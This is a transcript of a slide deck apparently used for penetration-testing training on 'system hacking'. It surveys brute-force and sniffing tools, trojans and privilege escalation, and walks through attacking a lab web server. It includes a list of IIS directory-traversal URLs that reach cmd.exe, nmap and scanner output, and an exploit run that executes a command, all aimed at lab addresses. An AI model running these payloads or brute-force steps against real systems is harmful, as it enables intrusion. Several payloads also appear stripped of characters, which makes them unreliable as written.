Title: System Hacking
1System Hacking
2Outline
- Service identification
- Vulnerability identification and research
- Exploits
- Putting it all together
- Target selection in large networks
- Using automated tools
3Service Identification
4Service Identification
- Common ports
- Banners
- Fingerprinting
5Connecting to ports
- Telnet or netcat is the best way to connect to
ports - Many services may be accessed directly
6Common ports
Many services can be identified by their common
port numbers
7Zone-h.org
8Alldas.de
9Banners
- Some services may be better identified by
banners - telnet on routers (2001, 4001, 6001)
- Web daemons for applications
- Compaq Insight Manager
- Many systems include web configuration interfaces
10Banners
11Fingerprinting
- Some services cannot be clearly identified just
by connecting the them - Netbus on NT uses the same port as an RPC service
on Solaris - Some database connections do not provide
automatic response - Fingerprinting a service may identify what it is,
even if it has moved ports
12Fingerprinting
13Vulnerability Research
14Vulnerability identification and research
- This is the process of mapping identified
security attributes of a system or application to
potential vulnerabilities - Several methods to map vulnerabilities
- Manually map identified systems against publicly
available database such as www.securityfocus.com,
www.cert.org and vendor security alerts - Use public exploit code posted to various
security mailing lists, hacker websites or write
your own code - Use automated vulnerability scanning tools such
as Nessus, ISS or whisker
15Vulnerability research
16Lab
- Explore the following security sites to identify
what vulnerability information would be of use to
you for the services you have identified. - www.securityfocus.com
- General searches on google.com
- www.packetstormsecurity.com
- www.astalavista.box.sk
- www.securiteam.com
- Time 30 minutes
17Exploits
18Types of exploits
- Remote exploits
- Trojans
- Privilege escalation
19Remote Exploits
20Remote exploits
- A remote exploit attempts to gain access across
the network and without proper authentication. - Examples
- Brute force authentication attempts
- Attacks bypassing integrity checkers
- Buffer overflows
- Sniffing (to some extent)
21Brute force attacks
- Most common services attacked
- Telnet
- FTP
- R commands
- Secure Shell
- SNMP community names
- Post Office Protocol (POP)
- HyperText Transport Protocol (HTTP/HTTPS)
- SMB
22Common Tools used
- Brutus
- Admsnmp
- Admsmb
- TeeNet
- Pwscan.pl
- Thc_hydra
23Remote password guessing
- Attempting to connect to an enumerated share such
as (ADMIN and C) and trying username/password
combinations until one works - A null session can be established with the
target to obtain valid account names - Use an automated password guessing tool to brute
force the selected shares.
24Brute force attacks under Windows
- Some common services prone to brute-force
- Web
- Netbios
- FTP
25(No Transcript)
26Legion
27Brute force attacks under Unix
- Some common services prone to brute-force
- telnet
- Ssh
- Web
- FTP
- R-commands
28Lab
- Use a Netbios scanning tool to identify local
shares on this network - Use brute force tool to attempt access to an
account on 10.0.1.120 - Warning! These tools can produce significant
traffic and lock accounts. - Time 30 minutes
29Buffer overflow attacks
- FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from
- LOUD-FAT-BLOKE
- Stack overflows
- Format string overflows
- Heap overflows
- Overflow subverting the control path
30Buffer overflow attacks
- FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from
- LOUD-FAT-BLOKE
31Buffer overflow attacks
- FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from
- LOUD-FAT-BLOKE
- Occurs when a user or process attempts to place
more data into a buffer than was originally
allocated - Commonly associated with C functions like
strcpy(), strcat(), sprintf() and etc - Most frequently found when user input is taken
and passed into an application
32Windows buffer overflows
- Only a few conditions have been revealed to date
- All of them exploited flaws in application
programs - Very common for DoS attacks
- Exploits
- Netmeeting 2.x by Cult of the Dead Cow
- NT RAS by Cerberus Information Security
- Winhlp32 by Cerberus Information Security
- IISHack by eEye
- Oracle Web Listener 4.0 by CIS
- Outlook GMT token overrun by Underground Security
Systems Research - IIS .printer
33Unix buffer overflows
34Unexpected input
- Bypassing integrity checks
- Gaining access by providing unexpected input
- IIS unicode
- Web applications
35Format string attacks
- Caused by programming errors in the formatted
output family of functions, which includes
printf() and sprintf() - Efforts usually focused on SUID root programs
36Input validation attacks
- Occurs when a program fails to recognise
syntactically incorrect input - Occurs when a module accepts extraneous input
- Occurs when a module fails to handle missing
input fields - A field-value correlation error occurs
- Common in web applications
37IIS vulnerabilities
- Unicode and URL based attacks
- Special tags in HTTP
- Sample scripts to brute force
38IIS hacking
- /scripts/root.exe?/cdir
- /MSADC/root.exe?/cdir
- /c/winnt/system32/cmd.exe?/cdir
- /d/winnt/system32/cmd.exe?/cdir
- /scripts/..255c../winnt/system32/cmd.exe?/cdir
- /_vti_bin/..255c../..255c../..255c../winnt/syst
em32/cmd.exe?/cdir - /_mem_bin/..255c../..255c../..255c../winnt/syst
em32/cmd.exe?/cdir - /msadc/..255c../..255c../..255c/..c11c../..c
11c../..c11c../winnt/system32/cmd.exe?/cdir - /scripts/..c11c../winnt/system32/cmd.exe?/cdir
- /scripts/..c02f../winnt/system32/cmd.exe?/cdir
- /scripts/..c0af../winnt/system32/cmd.exe?/cdir
- /scripts/..c19c../winnt/system32/cmd.exe?/cdir
- /scripts/..3563../winnt/system32/cmd.exe?/cdir
- /scripts/..35c../winnt/system32/cmd.exe?/cdir
- /scripts/..253563../winnt/system32/cmd.exe?/cd
ir - /scripts/..252f../winnt/system32/cmd.exe?/cdir
39Lab
- Use the provided URLs to roam the filesystem of
10.0.1.120 - What is accessible and what is not?
- Time 10 minutes
40Trojan Horses and Backdoors
41Windows trojans and backdoors
- These programs provide unauthorised access to a
system without the users knowledge - Theef
- CDC BackOrifice
- SubSeven
- Moosucker
- A great site http//www.tlsecurity.net
42Tlsecurity.net
43Privilege Escalation
44Privilege escalation
- Attack used to move from normal user to superuser
- Quest for Administrator
- Quest for root
45Quest for Administrator
- Hoovering information
- Getadmin
- Sechole
- Spoofing LPC Port requests
46Hoovering information
- Identify further information that will gain
higher privileges - Srvinfo
- Find utility
- regdmp
47Getadmin
- Windows NT 4
- Small program written by Konstantin Sobolev
- Adds users to the local admin group
- Hijacks a process called winlogon
- Patched by NT SP3
48Sechole
- Similar functionality to getadmin
- Modifies instructions in the memory of the
OpenProcess API - Possible to launch remotely if IIS is running
- Patched by NT SP6a
49Spoofing LPC Port Requests
- Vulnerability identified by The RAZOR Team at
http//razor.bindview.com - The code takes advantage of a flaw in one
function of the Local Procedure Call (LPC) Ports
API
50Quest for root
- Local buffer overflow
- Symlink
- File Descriptor attacks
- Signal handling
- Core-file manipulation
- Shared libraries
- Kernel flaws
- System misconfiguration
- IFS attacks
51Local buffer overflow
- Mostly used to exploit SUID root programs
- May add username to password file
52Sniffing
53Sniffing
- Sniffing works by setting a network card to
promiscuous mode - Sniffing only works on traffic travelling across
the local network - Sniffing is greatly complicated by network switchs
54Windows password sniffing
- Can use any ordinary packet analyser
- Or use a specialised tool such as l0phtcrack
- Some susceptible services
- Netbios
- FTP
- Web (especially cookies)
55Windows password sniffing
56Unix password sniffing
- Can use any ordinary packet analyser
- But Unix has some great sniffers such as dsniff
- Many Unix programs send passwords in clear text
- Some susceptible services
- Telnet
- FTP
- Web
57dsniff
- Netbios
- ftp
- telnet
- R-commands
- http
- Instant messenging
- And much much more!
58NT services
59Common NT services
60Profile Netbios
- Ports 135139
- Susceptible to sniffing, brute force
- Scanners available to search for shares
- Can give access to system registry
- Normally blocked at routers due to broadcast
61Profile Web
- Port 80, or any for special apps
- Common servers Apache, Oracle, IIS, Cold Fusion
- Very susceptible to DoS attacks
- Often give read access to all files
- IIS vulnerabilities are legendary
62Profile SMTP
- Port 25
- Very susceptible to mail relay
- Not a lot else
63Profile FTP
- Port21
- Part of IIS distribution
- Some vulnerabilities but not a large target
64Profile databases
- Ports 1433, 1510, 1725
- MSSql is a good internal network target
- MS and Oracle often set with default passwords
- SQL injection a favourite for web hackers
65Unix services
66Profile SNMP
- Port 160, 161 UDP
- SNMP has two default passwords public, private
- Tools such as snmpwalk good for enumerating
entries
67Profile TFTP
- Port 69
- Typically used to boot diskless workstations or
network devices such as routers - No username or password
- Good for sending around files from hacked systems
68Profile FTP
- Ports 20, 21
- Allows upload and download of files from a remote
system - Many ftp server allow anonymous access
- May be vulnerable to buffer overflow
- Can also be used for bounce attacks
69Profile Sendmail
- Port 25
- Mail transfer agent used on many Unix systems
- Can be used to identify accounts via the vrfy and
expn commands - Some version susceptible to denial of service and
buffer overflows - Long list of vulnerabilities
70Profile RPC
- Remote Procedure Call
- Allow a program on one computer to execute code
on a remote system
71Profile Web
- Port 80
- Apache is most common
- Not as many attacks as IIS
- Always check URLs for embedded commands
72Identifying targets in large networks
73Target selection
- Scan for specific services
- Database (MS, Oracle, Sybase)
- Web
- RPC
- R-commands
- View Netbios browse lists to make way to
PDC/server - View Netbios browse lists to identify treasury,
etc
74Automated vulnerability scanning tools
75Example automated applications
- Grinder
- SiteScan
- Whisker
- Twwscan
- Nessus
- Elza scriptable web client
76whisker
77Nessus
78Conclusion
- Hackers often search for specific known
vulnerabilities and avoid well-secured systems - Free tools make it simple to gain unauthorised
access to some systems - Tools such as Nessus should be used by every
security professional
79Putting it all together
80Our Configuration for today
For the purpose of the presentation, we will not
perform our tests over the internet But we wont
cheat by cutting out the firewall
Webserver Internal10.0.1.120 External10.0.0.120
TCP 80 only
Firewall 10.0.0.125 10.0.1.125
Router
81Network Penetration Tests
82Identifying firewall Strategy
- Identify the Web or Mail server
- Get the Next-Hop before this
- This will probably be the perimeter router or the
firewall - Firewall 1 NetScreen appear as a hop
- PIX does not appear as a hop (flattens the
network) - 80 chance that it will be NetScreen, PIX or
Firewall 1 - To figure out which
- ICMP ( i.e. Address Mask Request Response
headers) - Use TCP Stack finger printing
- Key ports (258, 259 263 could be firewall 1)
- IPSEC
- BUT luckily these days the tools are pre-written
83Identifying the Firewall - Traceroute
root_at_wireless root traceroute
10.0.0.120 traceroute to 10.0.0.120
(10.0.0.120) 30 hops max, 38 byte packets 1
2
UDP being blocked Need another tool
84Identifying the Firewall - LFT
lft -vv E -n 10.0.0.120 Looks like we made
it. Everyone responded. Moving on... Will
finish TWO Concluding with 2 hops. TTL LFT
trace to 10.0.0.12080/tcp 4.2 BSD bugnext
gateway may errantly reply with reused TTLs 1
target 10.0.0.12080 6.5ms 4.2 BSD bugnext
gateway may errantly reply with reused TTLs 2
target 10.0.0.12080 1.6ms
Suggests something between us
A firewall perhaps
Could also use MPTraceroute
85Accessible hosts sweep for the firewall
nmap -sP -n 10.0.0. Starting nmap V. 3.00 (
www.insecure.org/nmap/ ) Host (10.0.0.120)
appears to be up. Host (10.0.0.121) appears to
be down. Host (10.0.0.122) appears to be down.
Host (10.0.0.123) appears to be down. Host
(10.0.0.124) appears to be down. Host
(10.0.0.125) appears to be up. Host
(10.0.0.255) appears to be down. Nmap run
completed -- 256 IP addresses (2 hosts up)
scanned in 35 seconds
Our web server
Whos this
86Identifying the perimeter Ike-scan
ike-scan -v 10.0.0.125 Starting ike-scan 1.6
with 1 hosts --- Pass 1 of 3 completed --- Pass
2 of 3 completed --- Pass 3 of 3 completed
Ending ike-scan 1.6 1 hosts scanned in 22.595
seconds (0.04 hosts/sec). 0 returned handshake
0 returned notify
87Identifying the Firewall - conclusion
ping 10.0.0.120 PING 10.0.0.120 56(84)
bytes of data. 64 bytes from 10.0.0.120
icmp_seq1 ttl128 time0.280 ms --- 10.0.0.120
ping statistics --- 2 packets transmitted, 2
received, 0 loss ping -v -R 10.0.0.120
PING 10.0.0.120 56(124) bytes of data. ---
10.0.0.120 ping statistics --- 6 packets
transmitted, 0 received,100 loss
Windows !!
With low level Packet inspection I think not!!
88Identifying the Firewall Icmp processing
ping -v -T tsandaddr 10.0.0.120 PING 10.0.0.120
(10.0.0.120) from 10.0.0.1 56(124) bytes of
data. --- 10.0.0.120 ping statistics --- 16
packets transmitted, 0 received, 100 loss
ping -v -T tsandaddr 10.0.0.125 PING 10.0.0.125
(10.0.0.125) from 10.0.0.1 56(124) bytes of
data. --- 10.0.0.125 ping statistics --- 8
packets transmitted, 0 received, 100 loss
89Identifying the Firewall - Conclusion
- We suspect there is a firewall
- We know the web server is windows
- But windows is not normally capable of
manipulating packets to this extent - We are fairly sure that it isnt firewall 1
- Lets see if we can hack into the servers
90Hacking the other address - 10.0.0.125
91 Scanning 10.0.0.125
nmap -sS -n -p 1-10000 10.0.0.125 Starting
nmap 3.48 ( http//www.insecure.org/nmap/ ) All
10000 scanned ports on 10.0.0.125 are
filtered Nmap run completed -- 1 IP address (1
host up) nmap -sU -n -p 1-10000
10.0.0.125 Starting nmap 3.48 (
http//www.insecure.org/nmap/ ) All 10000
scanned ports on 10.0.0.125 are filtered Nmap
run completed -- 1 IP address (1 host up)
Nothing to hack
92Hacking the web server
93Hacking the web server
- Scan TCP ports
- Scan UDP ports
- !!! Only HTTP or HTTPS ports should be visible
- Run CGI scanner (I.e. Whisker, Crazymad or Nikto)
to look for web server exploits - Check Scanner
- Identify exploits
94Hacking the web server Scan UDP ports
-
- nmap -sU -n -p 1-10000 10.0.0.120
- Starting nmap 3.48
- All 10000 scanned ports on 10.0.0.120 are
filtered - Nmap run completed -- 1 IP address (1 host up)
scanned in 623.296 seconds -
-
-
Nothing to hack
95Hacking the web server Scan TCP ports
- nmap -sS -n -O -p 1-1024 10.0.0.120
- Interesting ports on 10.0.0.120
- (The 1023 ports scanned but are filtered)
- PORT STATE SERVICE
- 80/tcp open http
- Running (JUST GUESSING) Cisco pix os 6.X (88)
- Aggressive OS guesses Cisco PIX 501 running 6.x
- No exact OS matches for host.
-
- Nmap completed -- 1 IP address (1 host up)
HTTP - The only Port to hack
Now we know
96Hacking the web server Run CGI scanner
- ./whisker.pl -h 10.0.0.120
- -- whisker / v1.4.0 / rain forest puppy
- Host 10.0.0.120
- Server Microsoft-IIS/4.0
- 200 OK (IDC error) GET /scripts/samples/details
.idc - 200 OK (IDC error) GET /scripts/samples/ctguest
b.idc - 200 OK HEAD /scripts/tools/newdsn.exe
- this can be used to make DSNs, useful in use with
our ODBC exploit - - and the RDS exploit (with msadcs.dll)
- root_at_wireless v1.4 exit
97Hacking the web server Analysing CGI scanner
results
98Hacking the web server Analysing CGI scanner
results
99Hacking the web server Analysing CGI scanner
results
100Run exploit identified by scanner
- dsnhackII.pl -c -h 10.0.0.120
- NewDSN exploit v 1.3 -- Scrippie / Phreak.nl
- Checking for necessary files
- Checking for newdsn.exe -- Found
) - Checking for ctguestb.idc -- Found
) - Checking for details.idc -- Found
) - Now trying to create "Web SQL" DSN... ltsuccessgt
- Initializing GuestBook by GETting ctguestb.idc
- Type the command line you want to run (cmd /c
assumed) - cmd /c dir gtgt ..\hamster
- Now trying to execute command... ltsuccessgt
- root_at_wireless root
101Lab
- Attack the systems provided and attempt to get
command line access to NT - Time 45 minutes